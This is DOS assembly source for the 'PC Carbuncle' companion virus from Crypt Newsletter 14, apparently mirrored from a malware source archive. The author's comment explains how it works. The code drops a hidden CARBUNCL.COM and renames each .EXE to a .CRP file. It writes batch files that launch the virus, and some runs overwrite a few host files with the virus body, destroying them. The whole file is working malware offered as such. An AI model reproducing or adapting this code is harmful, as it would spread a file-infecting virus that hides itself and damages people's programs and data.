mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2024-12-22 19:36:11 +00:00
245 lines
8.0 KiB
NASM
245 lines
8.0 KiB
NASM
;The PC CARBUNCLE VIRUS - a companion virus for Crypt Newsletter 14
|
||
;The PC Carbuncle is a "toy" virus which will search out every .EXEfile
|
||
;in the current directory, rename it with a .CRP [for Crypt] extent and
|
||
;create a batchfile. The batchfile calls the PC Carbuncle [which has
|
||
;copied itself to a hidden file in the directory], renames the host
|
||
;file to its NORMAL extent, executes it, hides it as a .CRP file once
|
||
;again and issues a few error messages. The host files function
|
||
;normally. Occasionaly, the PC Carbuncle will copy itself to a few
|
||
;of the host .CRP files, destroying them. The majority of the host
|
||
;files in the PC Carbuncle-controlled directory will continue to function,
|
||
;in any case. If the user discovers the .CRP and .BAT files and is smart
|
||
;enough to delete the batchfiles and rename the .CRP hosts to their
|
||
;normal .EXE extents, the .CRPfiles which have been infected by the
|
||
;virus will re-establish the infection in the directory.
|
||
;--Urnst Kouch, Crypt Newsletter 14
|
||
|
||
.radix 16
|
||
code segment
|
||
model small
|
||
assume cs:code, ds:code, es:code
|
||
|
||
org 100h
|
||
begin:
|
||
jmp vir_start
|
||
db 'á<>.šâNst†d‰M–$' ; name
|
||
|
||
exit:
|
||
mov ah, 4Ch ; exit to DOS
|
||
int 21h
|
||
vir_start:
|
||
|
||
mov ah,2Ch ; DOS get system time.
|
||
int 21h ; <--alter values to suit
|
||
cmp dh,10 ; is seconds > 10?
|
||
jg batch_stage ; if so, be quiet (jg)
|
||
; with the virus counter, this feature arrests the
|
||
; overwriting infection so
|
||
; computing isn't
|
||
; horribly disrupted
|
||
; when the virus is about
|
||
mov al,5 ; infect only a few files
|
||
mov count,al ; by establishing a counter
|
||
|
||
|
||
start: mov ah,4Eh ; <----find first file of
|
||
recurse:
|
||
mov dx,offset crp_ext ; matching filemask, "*.crp"
|
||
int 21h ; because PC CARBUNCLE has
|
||
; in most cases, already created
|
||
; them.
|
||
jc batch_stage ; jump on carry to
|
||
; spawn if no .CRPfiles found
|
||
|
||
|
||
mov ax,3D01h ; open .CRPfile r/w
|
||
mov dx,009Eh
|
||
int 21h
|
||
|
||
mov bh,40h ;
|
||
mov dx,0100h ; starting from beginning
|
||
xchg ax,bx ; put handle in ax
|
||
mov cl,2Ah ; to write: PC CARBUNCLE
|
||
int 21h ; write the virus
|
||
mov ah,3Eh ; close the file
|
||
int 21h
|
||
|
||
dec count ; take one off the count
|
||
jz exit ; and exit when a few files
|
||
; are overwritten with virus
|
||
mov ah,4Fh ; find next file
|
||
jmp Short recurse ; and continue until all .CRP
|
||
; files converted to PC
|
||
; CARBUNCLE's
|
||
|
||
ret
|
||
|
||
batch_stage:
|
||
mov dx,offset file_create ; create file, name of
|
||
mov cx,0 ; CARBUNCL.COM
|
||
mov ah,3ch
|
||
int 21h
|
||
; Write virus body to file
|
||
mov bx,ax
|
||
mov cx,offset last - offset begin
|
||
mov dx,100h
|
||
mov ah,40h
|
||
int 21h
|
||
|
||
; Close file
|
||
mov ah,3eh ; ASSUMES bx still has file handle
|
||
int 21h
|
||
|
||
; Change attributes
|
||
mov dx,offset file_create ; of created file to
|
||
mov cx,3 ;(1) read only and (2) hidden
|
||
mov ax,4301h
|
||
int 21h
|
||
|
||
|
||
|
||
; get DTA
|
||
mov ah, 1Ah ; where to put dta
|
||
lea DX, [LAST+90H]
|
||
int 21h
|
||
mov ah, 4Eh ; find first .EXE file
|
||
small_loop: ; to CARBUNCL-ize
|
||
lea dx, [vict_ext] ; searchmask, *.exe
|
||
int 21h
|
||
jc exit
|
||
mov si, offset last + 90h + 30d ; save name
|
||
mov di, offset orig_name
|
||
mov cx, 12d
|
||
rep movsb
|
||
|
||
mov si, offset orig_name ; put name in bat buffer
|
||
mov di, offset bat_name
|
||
mov cx, 12d
|
||
rep movsb
|
||
|
||
cld
|
||
mov di, offset bat_name
|
||
mov al, '.'
|
||
mov cx, 9d
|
||
repne scasb
|
||
push cx
|
||
cmp word ptr es:[di-3],'SU' ; useless rubbish
|
||
jne cont
|
||
mov ah, 4fh
|
||
jmp small_loop
|
||
|
||
cont: mov si, offset bat_ext ;fix bat
|
||
mov cx, 3
|
||
rep movsb
|
||
pop cx
|
||
mov si, offset blank ;further fix bat
|
||
rep movsb
|
||
|
||
mov si, offset orig_name ; fill rename
|
||
mov di, offset rename_name
|
||
mov cx, 12d
|
||
rep movsb
|
||
|
||
mov di, offset rename_name
|
||
mov al, '.'
|
||
mov cx, 9
|
||
repne scasb
|
||
push cx
|
||
mov si, offset moc_ext ; fix rename
|
||
mov cx, 3
|
||
rep movsb
|
||
pop cx
|
||
mov si, offset blank ; further fix rename
|
||
rep movsb ; copy the string over
|
||
|
||
mov di, offset orig_name
|
||
mov al, ' '
|
||
mov cx, 12
|
||
repne scasb
|
||
mov si, offset blank ; put a few blanks
|
||
rep movsb
|
||
|
||
mov si, offset orig_name ;fill in the created batfile
|
||
mov di, offset com1
|
||
mov cx, 12d
|
||
rep movsb
|
||
|
||
mov si, offset orig_name ; more fill
|
||
mov di, offset com2
|
||
mov cx, 12d
|
||
rep movsb
|
||
|
||
mov si, offset orig_name ; copy more fill
|
||
mov di, offset com3
|
||
mov cx, 12d
|
||
rep movsb
|
||
mov si, offset blank
|
||
point_srch: dec di ; get rid of an annoying
|
||
cmp byte ptr [di], 00 ; period
|
||
jne point_srch
|
||
rep movsb
|
||
|
||
mov si, offset rename_name ; copy more fill
|
||
mov di, offset moc1
|
||
mov cx, 12d
|
||
rep movsb
|
||
|
||
mov si, offset rename_name ; copy still more fill
|
||
mov di, offset moc2
|
||
mov cx, 12d
|
||
rep movsb
|
||
|
||
mov dx, offset orig_name ; rename original file
|
||
mov di, offset rename_name ; to new .CRP name
|
||
mov ah, 56h
|
||
int 21h
|
||
|
||
mov dx, offset bat_name ; create batfile
|
||
xor cx, cx
|
||
mov ah, 3Ch
|
||
int 21h
|
||
|
||
mov bx, ax
|
||
mov cx, (offset l_bat - offset s_bat) ; length of batfile
|
||
mov dx, offset s_bat ; write to file
|
||
mov ah, 40h
|
||
int 21h
|
||
|
||
mov ah, 3eh ; close batfile
|
||
int 21h
|
||
next_vict: mov ah, 4fh ; find the next host
|
||
jmp small_loop ; and create more
|
||
; "controlled" .CRPs
|
||
count db 90h ;<---count buffer, bogus value
|
||
crp_ext db "*.crp",0 ;<---- searchmask for PC CARBUNCLE
|
||
file_create db "CARBUNCL.COM",0 ;<---CARBUNCL shadow virus
|
||
bat_ext db "BAT"
|
||
Vict_ext db "*.exe",0 ;<----searchmask for hosts to CARBUNCL-ize
|
||
moc_ext db "CRP" ; new extent for CARBUNCL-ized hosts
|
||
blank db " " ;blanks for filling batchfile
|
||
S_bat:
|
||
db "@ECHO OFF",0Dh,0Ah ; <--batchfile command lines
|
||
db "CARBUNCL",0Dh,0Ah ; call PC CARBUNCL shadow virus
|
||
db "RENAME "
|
||
moc1 db 12 dup (' '),' '
|
||
com1 db 12 dup (' '),0dh,0ah
|
||
com2 db 12 dup (' '),0dh,0ah
|
||
db "RENAME "
|
||
com3 db 12 dup (' '),' '
|
||
moc2 db 12 dup (' '),0dh,0ah
|
||
db "CARBUNCL",0Dh,0Ah,01Ah ;<---put dumb message here
|
||
L_bat: ; format "ECHO Fuck you lamer"
|
||
note: db "PC CARBUNCLE: Crypt Newsletter 14",0
|
||
|
||
bat_name db 12 dup (' '),0 ; on the fly workspace
|
||
rename_name db 12 dup (' '),0
|
||
orig_name db 12 dup (' '),0
|
||
Last: ;<---- end of virus place-holder
|
||
|
||
|
||
code ends
|
||
end begin
|
||
|
||
|
||
|